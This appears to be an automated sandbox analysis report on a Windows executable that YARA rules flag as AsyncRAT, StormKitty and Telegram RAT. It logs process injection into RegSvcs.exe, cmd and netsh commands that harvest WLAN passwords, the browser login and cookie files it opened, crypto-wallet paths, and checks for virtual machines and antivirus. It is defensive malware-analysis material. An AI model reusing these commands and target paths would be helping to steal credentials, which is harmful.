Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C1DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00C1DBBE
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BEC2A2 FindFirstFileExW,	1_2_00BEC2A2
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C268EE FindFirstFileW,FindClose,	1_2_00C268EE
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C2698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	1_2_00C2698F
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C1D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00C1D076
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C1D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00C1D3A9
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C29642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00C29642
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C2979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_00C2979D
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C29B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	1_2_00C29B2B
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C25C97 FindFirstFileW,FindNextFileW,FindClose,	1_2_00C25C97

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00BB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_00BB42DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599326	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599108	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597465	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597217	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597064	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596577	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99869	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99760	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594332	Jump to behavior

Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: RegSvcs.exe, 00000007.00000002.2530033769.0000000004C49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDria
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: RegSvcs.exe, 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: vmware
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: RegSvcs.exe, 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: VMwareVBox
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: tmpB53C.tmp.dat.7.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_05350B20 LdrInitializeThunk,

7_2_05350B20

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C2EAA2 BlockInput,

1_2_00C2EAA2

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00BE2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_00BE2622

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00BB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_00BB42DE

Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BD4CE8 mov eax, dword ptr fs:[00000030h]	1_2_00BD4CE8
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00FB0860 mov eax, dword ptr fs:[00000030h]	1_2_00FB0860
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00FB1EF0 mov eax, dword ptr fs:[00000030h]	1_2_00FB1EF0
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00FB1E90 mov eax, dword ptr fs:[00000030h]	1_2_00FB1E90

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C10B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

1_2_00C10B62

Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BE2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00BE2622
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BD083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00BD083F
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BD09D5 SetUnhandledExceptionFilter,	1_2_00BD09D5
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00BD0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00BD0C21

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 5C3008

Jump to behavior

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

1_2_00C11201

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00BF2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_00BF2BA5

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C1B226 SendInput,keybd_event,

1_2_00C1B226

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C322DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

1_2_00C322DA

Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\6mllsKaB2q.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

1_2_00C10B62

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C11663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_00C11663

Source: 6mllsKaB2q.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 6mllsKaB2q.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00BD0698 cpuid

1_2_00BD0698

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C28195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

1_2_00C28195

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00C0D27A GetUserNameW,

1_2_00C0D27A

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00BEB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

1_2_00BEB952

Source: C:\Users\user\Desktop\6mllsKaB2q.exe

Code function: 1_2_00BB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_00BB42DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6mllsKaB2q.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected StormKitty Stealer

Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6mllsKaB2q.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6mllsKaB2q.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR

Yara detected WorldWind Stealer

Source: Yara match

File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 6mllsKaB2q.exe, 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Electrum#\Electrum\wallets
Source: 6mllsKaB2q.exe, 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: 6mllsKaB2q.exe, 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: 6mllsKaB2q.exe, 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: 6mllsKaB2q.exe, 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: 6mllsKaB2q.exe, 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: 6mllsKaB2q.exe, 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
Source: 6mllsKaB2q.exe, 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore

Tries to harvest and steal WLAN passwords

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Source: 6mllsKaB2q.exe	Binary or memory string: WIN_81
Source: 6mllsKaB2q.exe	Binary or memory string: WIN_XP
Source: 6mllsKaB2q.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing 